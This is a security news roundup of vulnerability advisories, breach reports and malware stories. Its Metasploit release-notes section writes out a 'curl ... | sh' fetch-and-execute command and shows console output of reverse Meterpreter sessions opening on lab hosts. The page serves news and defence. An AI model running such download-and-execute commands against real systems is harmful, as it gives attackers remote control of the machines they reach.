CyberSecurity News

Source: Security Affairs

SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 106

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter CrashStealer: C++ macOS infostealer posing as crash reporter Lucide Proxy: Turning Student Web Proxies into DDoS Bots       AsyncAPI npm organization compromised, 2M weekly downloads affected   OkoBot: new sophisticated malware framework targets cryptocurrency users  […]

Source: Security Affairs

Security Affairs newsletter Round 586 by Pierluigi Paganini – INTERNATIONAL EDITION

A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. OpenSSL Fixes HollowByte Memory Exhaustion Bug Daxin: 13-Year-Old China-Linked Malware Found Still Active on Manufacturer’s Network […]

UAC-0145 Uses ClickFix CAPTCHAs to Infect Ukrainian Devices wih Malware
Source: The Hacker News

UAC-0145 Uses ClickFix CAPTCHAs to Infect Ukrainian Devices wih Malware

Russian state-sponsored threat actors have been observed leveraging the infamous ClickFix strategy to trick Ukrainian targets into infecting their own machines with data-stealing malware. According to the Computer Emergency Response Team of Ukraine (CERT-UA), the activity has been attributed to UAC-0145, a sub-cluster within Sandworm, an advanced hacking unit affiliated with GRU, Russia's

SonicWall SMA Zero-Days Exploited Before Disclosure to Gain Root Access
Source: The Hacker News

SonicWall SMA Zero-Days Exploited Before Disclosure to Gain Root Access

A previously undocumented threat actor has been attributed to the exploitation of recently disclosed SonicWall Secure Mobile Access (SMA) 1000 series VPN appliances as zero-days prior their public disclosure since June 22, 2026. Cybersecurity company Volexity is tracking the activity under the moniker UTA0533. The discovery was made following an incident response investigation earlier this

Source: Security Affairs

Attackers Can Take Over WordPress Sites Using Newly Released wp2shell Exploits

Public exploits are now available for two critical WordPress flaws that attackers can chain to gain remote code execution without authentication. Public proof-of-concept exploits are now available for the critical wp2shell vulnerabilities affecting WordPress Core. The flaws, tracked as CVE-2026-63030 and CVE-2026-60137, can be chained to achieve pre-authentication remote code execution on default WordPress installations […]

Source: Security Affairs

OpenSSL Fixes HollowByte Memory Exhaustion Bug

Okta disclosed HollowByte, an 11-byte OpenSSL flaw that lets remote attackers exhaust server memory and trigger denial-of-service attacks. Okta’s Red Team disclosed a denial-of-service vulnerability in OpenSSL they named HollowByte, and the attack payload is exactly 11 bytes. A remote, unauthenticated attacker sends that payload and the server allocates up to 131 KB of memory […]

Source: Security Affairs

Daxin: 13-Year-Old China-Linked Malware Found Still Active on Manufacturer’s Network

Researchers found China’s Daxin rootkit and a new Stupig backdoor on a Taiwan firm’s network, suggesting a stealthy intrusion dating back to 2013. Symantec’s Threat Hunter Team found Daxin running on a compromised host at a Taiwan-based subsidiary of a multinational high-tech manufacturer in 2026. Daxin is a Windows kernel-mode rootkit that Symantec first documented […]

Source: Security Affairs

U.S. CISA adds Fortinet FortiSandbox and Microsoft SharePoint flaws to its Known Exploited Vulnerabilities catalog

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Fortinet FortiSandbox and Microsoft SharePoint flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Fortinet FortiSandbox and Microsoft SharePoint flaws to its Known Exploited Vulnerabilities (KEV) catalog. This week, Microsoft’s July 2026 Patch Tuesday addressed the SharePoint remote code execution bug […]

CVE-2026-63030: wp2shell a Critical Remote Code Execution Vulnerability in WordPress Core
Source: Rapid7 Blog

CVE-2026-63030: wp2shell a Critical Remote Code Execution Vulnerability in WordPress Core

<p></p><h2 style="direction: ltr;"><span style="font-size: undefined;">Overview</span></h2><p style="direction: ltr;"><span style="font-size: undefined;">On July 17, 2026, a GitHub Security Advisory was </span><a href="https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662q"><span style="font-size: undefined;">published</span></a><span style="font-size: undefined;"> for </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-63030"><span style="font-size: undefined;">CVE-2026-63030</span></a><span style="font-size: undefined;">, a critical unauthenticated remote code execution vulnerability affecting </span><a href="https://wordpress.org/news/2026/07/wordpress-7-0-2-release/"><span style="font-size: undefined;">WordPress Core</span></a><span style="font-size: undefined;">. WordPress Core. While the official GitHub security advisory classifies the severity as Critical, the vulnerability has currently been assigned a CVSS score of 7.5. WordPress is one of the most widely deployed content management systems, making vulnerabilities in its core software potentially significant for organizations operating public-facing websites. The vulnerability </span><a href="https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/"><span style="font-size: undefined;">reportedly allows</span></a><span style="font-size: undefined;"> an unauthenticated attacker to execute code via the WordPress REST API batch endpoint, potentially resulting in complete compromise of the website and its underlying data. No valid account or user interaction is required.</span></p><p style="direction: ltr;"><span style="font-size: undefined;">According to the </span><a href="https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ff9f-jf42-662q"><span style="font-size: undefined;">advisory</span></a><span style="font-size: undefined;">, the vulnerability affects WordPress versions 6.9.0 through 6.9.4 and versions 7.0.0 through 7.0.1. The issue is fixed in WordPress 6.9.5 and 7.0.2. A fix is also included in WordPress 7.1 Beta 2.</span></p><p style="direction: ltr;"><span style="font-size: undefined;">Cloudflare </span><a href="https://blog.cloudflare.com/wordpress-vulnerabilities/"><span style="font-size: undefined;">reported</span></a><span style="font-size: undefined;"> that the vulnerable code path can be reached when a persistent object cache is not in use. Searchlight Cyber, whose researchers identified the vulnerability, stated that it can be exploited remotely against a default WordPress installation without requiring additional plugins.</span></p><p style="direction: ltr;"><span style="font-size: undefined;">Technical exploit details have not yet been published by </span><a href="https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/"><span style="font-size: undefined;">Searchlight Cyber</span></a><span style="font-size: undefined;">, as of July 17 5:45 PM Eastern time. At the time of publication, Rapid7 is not aware of publicly confirmed in-the-wild exploitation. Organizations should not interpret the absence of public exploitation reports as an indication of low risk, particularly given the vulnerability’s unauthenticated attack path and the widespread deployment of WordPress; affected WordPress sites should be urgently patched.  Due to WordPress Core being an open-source project and given the current ability of AI models to analyze open-source code, Rapid7 Labs believes it is highly likely that a public PoC will be made available in a short period of time.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style="font-size: undefined;">Organizations operating affected WordPress installations should prioritize upgrading immediately. Applying the WordPress-provided update is the most effective way to remediate CVE-2026-63030.</span></p><p style="direction: ltr;"><span style="font-size: undefined;">Affected and fixed versions include:</span></p><p><span style="font-size: undefined;"></span></p><table><colgroup><col style="width: 24.26229508196721%;" /><col style="width: 42.622950819672134%;" /><col style="width: 33.114754098360656%;" /></colgroup><thead><tr><th><p style="direction: ltr;"><span style="font-size: undefined;">WordPress branch</span></p></th><th><p style="direction: ltr;"><span style="font-size: undefined;">Affected versions</span></p></th><th><p style="direction: ltr;"><span style="font-size: undefined;">Fixed version</span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style="font-size: undefined;">Earlier than 6.9</span></p></td><td><p style="direction: ltr;"><span style="font-size: undefined;">Not affected by CVE-2026-63030</span></p></td><td><p style="direction: ltr;"><span style="font-size: undefined;">No action required for this CVE</span></p></td></tr><tr><td><p style="direction: ltr;"><span style="font-size: undefined;">6.9</span></p></td><td><p style="direction: ltr;"><span style="font-size: undefined;">6.9.0 through 6.9.4</span></p></td><td><p style="direction: ltr;"><span style="font-size: undefined;">6.9.5</span></p></td></tr><tr><td><p style="direction: ltr;"><span style="font-size: undefined;">7.0</span></p></td><td><p style="direction: ltr;"><span style="font-size: undefined;">7.0.0 through 7.0.1</span></p></td><td><p style="direction: ltr;"><span style="font-size: undefined;">7.0.2</span></p></td></tr><tr><td><p style="direction: ltr;"><span style="font-size: undefined;">7.1 beta</span></p></td><td><p style="direction: ltr;"><span style="font-size: undefined;">Affected beta versions were not fully specified</span></p></td><td><p style="direction: ltr;"><span style="font-size: undefined;">7.1 Beta 2</span></p></td></tr></tbody></table><p style="direction: ltr;"><span style="font-size: undefined;"></span></p><p><span style="font-size: undefined;">WordPress maintainers </span><a href="https://wordpress.org/news/2026/07/wordpress-7-0-2-release/"><span style="font-size: undefined;">stated</span></a><span style="font-size: undefined;"> they are forcing updates for affected installations with automatic updates enabled. Administrators should nevertheless verify that each internet-facing WordPress website has successfully upgraded to WordPress 6.9.5, 7.0.2, or another fixed release appropriate for its branch. Workarounds are not recommended at this time.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h2 style="direction: ltr;">Exposure Command, InsightVM, and Nexpose</h2><p></p><p style="direction: ltr;"><span style="font-size: undefined;">Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-63030 with authenticated vulnerability checks available in the July 20th, 2026 content release.</span></p><p></p><h2 style="direction: ltr;">Updates</h2><p style="direction: ltr;"><span style="font-size: undefined;"><strong>July 17, 2026:</strong></span><span style="font-size: undefined;"> Initial publication.</span></p><p></p>

Source: Security Affairs

Ernst & Young (EY) Investigates Data Breach Involving Third-Party Support Tickets

Ernst &#38; Young (EY) disclosed a data breach after attackers compromised a third-party IT support system containing client documents and tax information. Ernst &#38; Young (EY) is disclosed a data breach linked to a compromised third-party support ticket system used by its IT teams. The platform stored support requests that may have included documents containing [&#8230;]

New wp2shell WordPress Core Flaw Lets Unauthenticated Attackers Run Code
Source: The Hacker News

New wp2shell WordPress Core Flaw Lets Unauthenticated Attackers Run Code

An anonymous HTTP request can run code on a WordPress site. The bug is in core, so a bare install with zero plugins is exploitable. Every 6.9 and 7.0 site was in range until Friday, when WordPress shipped 6.9.5 and 7.0.2 and enabled what it calls forced updates through its auto-update system. Adam Kues at Assetnote, Searchlight Cyber's attack surface management arm, found the flaw and reported

Source: Schneier on Security

Friday Squid Blogging: Squid Washing Up on Cape Cod Beach

<p>Lots of <a href="https://www.boston25news.com/news/thousands-squid-wash-up-cape-cod-beach/e41059e1-200e-4341-96d8-68dc9cf3bc52/">articles</a> <a href="https://onthewater.com/why-are-thousands-of-squid-beaching-themselves-on-cape-cod">about</a> <a href="https://www.wcvb.com/article/thousands-of-squid-wash-up-on-provincetown-beaches/71536889">this</a>.</p> <p>As usual, you can also use this squid post to talk about the security stories in the news that I haven&#8217;t covered.</p> <p><a href="https://www.schneier.com/blog/archives/2024/06/new-blog-moderation-policy.html">Blog moderation policy.</a></p>

OpenSSL HollowByte Flaw Could Freeze Server Memory with 11-Byte TLS Requests
Source: The Hacker News

OpenSSL HollowByte Flaw Could Freeze Server Memory with 11-Byte TLS Requests

Eleven bytes will make an unpatched OpenSSL server set aside up to 131 KB of memory for a message that never arrives. On the glibc systems Okta tested, that memory is gone until the process restarts. OpenSSL shipped the HollowByte fix in June with no CVE, no advisory, and no changelog entry pointing at it. Okta's Red Team, which reported the denial-of-service bug and named it, published the

Metasploit Wrap Up: An HTTP to SMB relay plus Payload Improvements
Source: Rapid7 Blog

Metasploit Wrap Up: An HTTP to SMB relay plus Payload Improvements

<h2>Metasploit Wrap Up Housekeeping</h2><p>While the Metasploit Framework will be continuing its weekly release cadence, bringing you dear reader our latest content, the Weekly Wrap Up is being shifted to a bi-weekly cadence. The team is planning to use the additional time between posts to record demos of some of the more exciting content. Stay tuned for the next generation of Metasploit Wrap Ups and be sure to subscribe to the <a href="https://www.rapid7.com/blog/tag/metasploit/rss/">RSS Feed</a> to be alerted when new blogs are released.</p><h2>Fetch Multi: Just Fetch and Forget?</h2><p>Our very own <a href="https://github.com/bwatters-r7">bwatters-r7</a> continued to enhance our Fetch Payloads implementation. This time adding a new Linux Fetch Multi payload family that supports on-the-fly Linux architecture identification. Standard Fetch payloads produce a command that will download and execute a specific binary payload on a target, but the new Linux Fetch Multi family will report the architecture of the target host when it requests the payload, and the handler will automatically serve the correct elf architecture payload for the given target. It means that if a user is exploiting a Linux host, they do not need to guess the target’s architecture when selecting a payload. It also means that one payload and one handler can serve across multiple targets of differing architectures. Since these payloads work by adding a query string, only HTTP and HTTPS-based fetch payloads support Fetch Multi payloads.</p><p>Here is an example of the same payload and handler identifying and delivering the proper elf architecture payloads to a mipsel host, a mips64 host, and an aarch64 host by just executing the command <span>curl -s http://10.5.135.210:8080/x|sh</span> on each target.</p><p></p><pre>msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; show options Module options (payload/cmd/linux/http/multi/meterpreter_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, GET, TFTP, TNFTP, WGET) FETCH_DELETE false yes Attempt to delete the binary after execution FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3 .8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+ , shell-search, shell) FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH x no Local URI to use for serving payload LHOST 10.5.135.210 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port When FETCH_COMMAND is one of CURL,GET,WGET: Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_PIPE true yes Host both the binary payload and the command so it can be piped dire ctly to the shell. When FETCH_FILELESS is none: Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_FILENAME cldOGvRDplZ no Name to use on remote system when storing payload; cannot co ntain spaces or slashes FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces View the full module info with the info, or info -d command. msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; to_handler [*] Command to execute on target: curl -s http://10.5.135.210:8080/x|sh [*] Payload Handler Started as Job 0 [*] Fetch handler listening on 10.5.135.210:8080 [*] HTTP server started [*] Adding resource /csmCra8lnQTHxFXkipQC0w [*] Adding resource /x [*] Started reverse TCP handler on 10.5.135.210:4444 msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; [*] Client 10.5.132.212 requested /x [*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3) [*] Client 10.5.132.212 requested /csmCra8lnQTHxFXkipQC0w?arch=armv7l [*] Sending payload to 10.5.132.212 (curl/8.13.0-rc3) [*] Dynamic Payload Detected, expecting a Query String in the request... [*] Building payload for armle arch [*] Meterpreter session 1 opened (10.5.135.210:4444 -&gt; 10.5.132.212:45068) at 2026-07-14 11:33:18 -0500 [*] Client 10.5.132.214 requested /x [*] Sending payload to 10.5.132.214 (curl/8.11.0) [*] Client 10.5.132.214 requested /csmCra8lnQTHxFXkipQC0w?arch=aarch64 [*] Sending payload to 10.5.132.214 (curl/8.11.0) [*] Dynamic Payload Detected, expecting a Query String in the request... [*] Building payload for aarch64 arch [*] Meterpreter session 2 opened (10.5.135.210:4444 -&gt; 10.5.132.214:39894) at 2026-07-14 11:33:26 -0500 [*] Client 10.5.132.224 requested /x [*] Sending payload to 10.5.132.224 (curl/7.52.1) [*] Client 10.5.132.224 requested /csmCra8lnQTHxFXkipQC0w?arch=mips64 [*] Sending payload to 10.5.132.224 (curl/7.52.1) [*] Dynamic Payload Detected, expecting a Query String in the request... [*] Building payload for mips64 arch [*] Meterpreter session 3 opened (10.5.135.210:4444 -&gt; 10.5.132.224:53506) at 2026-07-14 11:33:41 -0500 msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt; sessions -C sysinfo [*] Running 'sysinfo' on meterpreter session 1 (10.5.132.212) Computer : kali-raspberrypi OS : Debian (Linux 5.15.44-Re4son-v7+) Architecture : armv7l BuildTuple : armv5l-linux-musleabi Meterpreter : cmd/linux [*] Running 'sysinfo' on meterpreter session 2 (10.5.132.214) Computer : kali-raspberrypi OS : Debian (Linux 5.15.44-Re4son-v8l+) Architecture : aarch64 BuildTuple : aarch64-linux-musl Meterpreter : cmd/linux [*] Running 'sysinfo' on meterpreter session 3 (10.5.132.224) Computer : ubnt OS : Debian 9.13 (Linux 4.9.79-UBNT) Architecture : mips64 BuildTuple : mips64-linux-muslsf Meterpreter : cmd/linux msf payload(cmd/linux/http/multi/meterpreter_reverse_tcp) &gt;</pre><h2>RISC architecture is going to change everything!</h2><p>Speaking of juggling multiple architectures, <a href="https://github.com/bcoles">bcoles</a> added support for yet another IoT arch: RiscV. The change adds staged and stageless shell payloads for both 32- and 64-bit RiscV systems, and dovetails well with his other PR adding XOR encoders for RiscV payloads.</p><h2>New module content (4)</h2><h3>Microsoft Windows HTTP to SMB Relay</h3><p>Author: jheysel-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21620">#21620</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a></p><p>Path: server/relay/http_to_smb</p><p>Description: Adds an HTTP to SMB Relay server module allowing users to relay an incoming NTLM HTTP authentication request to multiple SMB servers in order to establish SMB session on the target hosts to be used by the framework.</p><h3>Byte XORi Encoder</h3><p>Author: bcoles <a href="mailto:[email protected]">[email protected]</a></p><p>Type: Encoder</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21235">#21235</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Path: riscv32le/byte_xori</p><p>Description: Add four encoder variants for both RISC-V 32-bit and 64-bit little-endian architectures.</p><h3>FTP, HTTP, HTTPS and METERPRETER_REVERSE_TCP Fetch, Linux Chmod</h3><p>Authors: Brendan Watters, Spencer McIntyre, and bcoles <a href="mailto:[email protected]">[email protected]</a></p><p>Type: Payload (Adapter)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21384">#21384</a> contributed by <a href="https://github.com/bwatters-r7">bwatters-r7</a></p><p>Description: Adds Linux fetch multi payloads, a fetch server for FTP-based fetch payloads, a TFTP server to rex/proto to align with our other servers.</p><p>This adapter adds 421 new payloads for all Linux and Windows architectures including:</p><ul><li>cmd/linux/ftp/aarch64/chmod</li><li>cmd/linux/ftp/x86/meterpreter/reverse_tcp</li><li>cmd/windows/ftp/aarch64/meterpreter_reverse_http</li></ul><h3>FTP Fetch, Linux dup2 Command Shell, Bind TCP Stager</h3><p>Authors: Brendan Watters, Spencer McIntyre, and bcoles <a href="mailto:[email protected]">[email protected]</a></p><p>Type: Payload (Stager)</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21237">#21237</a> contributed by <a href="https://github.com/bcoles">bcoles</a></p><p>Description: Adds reverse_tcp and bind_tcp stagers and a shell command stage for both RISC-V 64-bit and 32-bit little-endian Linux targets.</p><ul><li>cmd/linux/ftp/riscv32le/shell/bind_tcp</li><li>cmd/linux/http/riscv32le/shell/bind_tcp</li><li>cmd/linux/https/riscv32le/shell/bind_tcp</li><li>cmd/linux/tftp/riscv32le/shell/bind_tcp</li><li>linux/riscv32le/shell/bind_tcp</li><li>cmd/linux/ftp/riscv32le/shell/reverse_tcp</li><li>cmd/linux/http/riscv32le/shell/reverse_tcp</li><li>cmd/linux/https/riscv32le/shell/reverse_tcp</li><li>cmd/linux/tftp/riscv32le/shell/reverse_tcp</li><li>linux/riscv32le/shell/reverse_tcp</li><li>cmd/linux/ftp/riscv64le/shell/bind_tcp</li><li>cmd/linux/http/riscv64le/shell/bind_tcp</li><li>cmd/linux/https/riscv64le/shell/bind_tcp</li><li>cmd/linux/tftp/riscv64le/shell/bind_tcp</li><li>linux/riscv64le/shell/bind_tcp</li><li>cmd/linux/ftp/riscv64le/shell/reverse_tcp</li><li>cmd/linux/http/riscv64le/shell/reverse_tcp</li><li>cmd/linux/https/riscv64le/shell/reverse_tcp</li><li>cmd/linux/tftp/riscv64le/shell/reverse_tcp</li><li>linux/riscv64le/shell/reverse_tcp</li></ul><h2>Enhancements and features (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21235">#21235</a> from <a href="https://github.com/bcoles">bcoles</a> - Add four encoder variants for both RISC-V 32-bit and 64-bit little-endian architectures.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21384">#21384</a> from <a href="https://github.com/bwatters-r7">bwatters-r7</a> - Adds Linux fetch multi payloads, a fetch server for FTP-based fetch payloads, a TFTP server to rex/proto to align with our other servers.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21599">#21599</a> from <a href="https://github.com/Pushpenderrathore">Pushpenderrathore</a> - This extends CertificateTrace functionality to also surface the server's TLS peer certificate when an HTTP module connects over HTTPS. This makes use of the same CertificateTrace enum (off/metadata/full) operators are already familiar with.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21602">#21602</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Updates the Windows service PE template to use an injected segment instead of the old substitution method.</li></ul><h2>Bugs fixed (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21621">#21621</a> from <a href="https://github.com/eipoverflow">eipoverflow</a> - This fix a limitation on running fileless staged Meterpreter in recent OSX versions.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21670">#21670</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Marks the dynamic XOR encoders as unable to preserve registers and adds regression coverage for stage encoding when a preserved register is required.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21675">#21675</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Fix search_cache job cache generation by skipping multi arch payloads.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21677">#21677</a> from <a href="https://github.com/bwatters-r7">bwatters-r7</a> - Fixes a bug in the HTTP relay server mixin where requests matching the module's URIPATH were silently dropped instead of being relayed The fix removes the now-unnecessary URIPATH option, ensures all requests are properly relayed, and adds spec tests to cover the fix.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-07-08T13%3A32%3A18-07%3A00..2026-07-15T15%3A48%3A48-07%3A00%22">Pull Requests 6.4.143...6.4.144</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.143...6.4.144">Full diff 6.4.143...6.4.144</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>

Seven Malicious Vite npm Packages Use Blockchain C2 to Deliver a RAT
Source: The Hacker News

Seven Malicious Vite npm Packages Use Blockchain C2 to Deliver a RAT

Cybersecurity researchers have discovered a cluster of seven malicious npm packages targeting the Vite frontend tooling ecosystem as part of a software supply chain attack. The malicious package campaign, codenamed ViteVenom by Checkmarx, marks an expansion of ChainVeil, which was observed using an "unprecedented" four-tier blockchain-based command-and-control (C2) infrastructure spanning Tron,

CVE-2026-58644: Microsoft SharePoint Server Unauthenticated Remote Code Execution Vulnerability Exploited in the Wild
Source: Rapid7 Blog

CVE-2026-58644: Microsoft SharePoint Server Unauthenticated Remote Code Execution Vulnerability Exploited in the Wild

<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style="font-size: undefined;">On July 14, 2026, Microsoft </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644"><span style="font-size: undefined;">published</span></a><span style="font-size: undefined;"> a security advisory addressing </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-58644"><span style="font-size: undefined;">CVE-2026-58644</span></a><span style="font-size: undefined;">, a critical remote code execution (RCE) vulnerability affecting on-premises Microsoft SharePoint Server deployments. The vulnerability, which carries a CVSS v3.1 score of 9.8 (Critical), results from the deserialization of untrusted data (</span><a href="https://cwe.mitre.org/data/definitions/502.html"><span style="font-size: undefined;">CWE-502</span></a><span style="font-size: undefined;">) and allows an unauthenticated attacker to execute arbitrary code.</span></p><p style="direction: ltr;"><span style="font-size: undefined;">Microsoft confirmed active exploitation of CVE-2026-58644, and the vulnerability was subsequently added to CISA’s Known Exploited Vulnerabilities (</span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog"><span style="font-size: undefined;">KEV</span></a><span style="font-size: undefined;">) catalog on July 16, 2026. In parallel, CISA </span><a href="https://www.cisa.gov/news-events/alerts/2026/07/14/cisa-urges-sharepoint-hardening-after-new-exploitations"><span style="font-size: undefined;">published</span></a><span style="font-size: undefined;"> guidance recommending organizations immediately apply Microsoft’s security updates and leverage Microsoft Defender and AMSI detections to identify exploitation attempts.</span></p><p style="direction: ltr;"><span style="font-size: undefined;">Affected products:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Microsoft SharePoint Enterprise Server 2016</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Microsoft SharePoint Server 2019</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Microsoft SharePoint Server Subscription Edition</span></p></li></ul><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style="font-size: undefined;">Organizations operating affected on-premises Microsoft SharePoint Server should prioritize remediation on an emergency basis.</span></p><p style="direction: ltr;"><span style="font-size: undefined;">Microsoft’s recommendations:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Apply the July 14, 2026 security updates for all affected SharePoint versions.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Verify that security updates completed successfully across all SharePoint servers.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Ensure Antimalware Scan Interface (AMSI) integration is enabled for every SharePoint web application.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Monitor Microsoft Defender and AMSI detections for indicators of attempted exploitation.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Initiate incident response procedures if exploitation artifacts are detected.</span></p></li></ul><p style="direction: ltr;"><span style="font-size: undefined;">Microsoft and CISA </span><a href="https://www.cisa.gov/news-events/alerts/2026/07/14/cisa-urges-sharepoint-hardening-after-new-exploitations"><span style="font-size: undefined;">recommend</span></a><span style="font-size: undefined;"> monitoring for the following security detections associated with observed SharePoint exploitation activity.</span></p><p style="direction: ltr;"><span style="font-size: undefined;">AMSI / Microsoft Defender detections:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Exploit:Script/SuspSignoutReqBody.A</span></p></li></ul><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Request body scanning</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">SharePoint Server Subscription Edition</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Microsoft reports observed exploitation attempts are blocked by this signature.</span></p></li></ul><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Exploit:Script/ToolPaneAuthBypass.A</span></p></li></ul><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Request header scanning</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Applies to SharePoint Server 2016, SharePoint Server 2019, and Subscription Edition.</span></p></li></ul><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style="font-size: undefined;">Exploit:Script/ToolPaneAuthBypass</span></p></li></ul><p style="direction: ltr;"><span style="font-size: undefined;">At the time of publication, no public IP addresses, domains, URLs, or additional network-based indicators of compromise have been widely disclosed.</span></p><p style="direction: ltr;"><span style="font-size: undefined;">Administrators should consult Microsoft’s </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58644"><span style="font-size: undefined;">advisory</span></a><span style="font-size: undefined;"> for the most current remediation guidance and update availability.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;">Exposure Command, InsightVM, and Nexpose</h3><p style="direction: ltr;"><span style="font-size: undefined;">Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-58644 with an authenticated vulnerability check available since the July 14 content release.</span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><span style="font-size: undefined;"><strong>July 17, 2026</strong></span><span style="font-size: undefined;">: Initial publication.</span></li></ul><p></p>

Source: Security Affairs

A cyberattack hit Nichirei, one of Japan’s largest food companies

A cyberattack hit one of Japan&#8217;s largest food companies, Nichirei, disrupting logistics and shipments. The company is gradually restoring operations. Nichirei is one of Japan&#8217;s largest food companies, best known for its frozen food business. Founded in 1942 and headquartered in Tokyo, it operates globally through dozens of subsidiaries. The food giant confirmed that the [&#8230;]

New NadMesh Botnet Hunts Exposed AI Services for Cloud Keys and Kubernetes Tokens
Source: The Hacker News

New NadMesh Botnet Hunts Exposed AI Services for Cloud Keys and Kubernetes Tokens

A Go botnet called NadMesh turned up in early July hunting exposed AI services, and the operator's own dashboard claims 3,811 unique AWS keys. A Shodan harvester keeps the scan queue stocked with ComfyUI, Ollama, n8n, Open WebUI, Langflow, and Gradio: the image generators, local model runners, and workflow builders that teams stand up fast and firewall late. The intel feed behind that counter

The Real AI Threat Is Blind Trust
Source: Dark Reading

The Real AI Threat Is Blind Trust

AI models left to both interpret and execute commands eliminate critical cybersecurity oversight.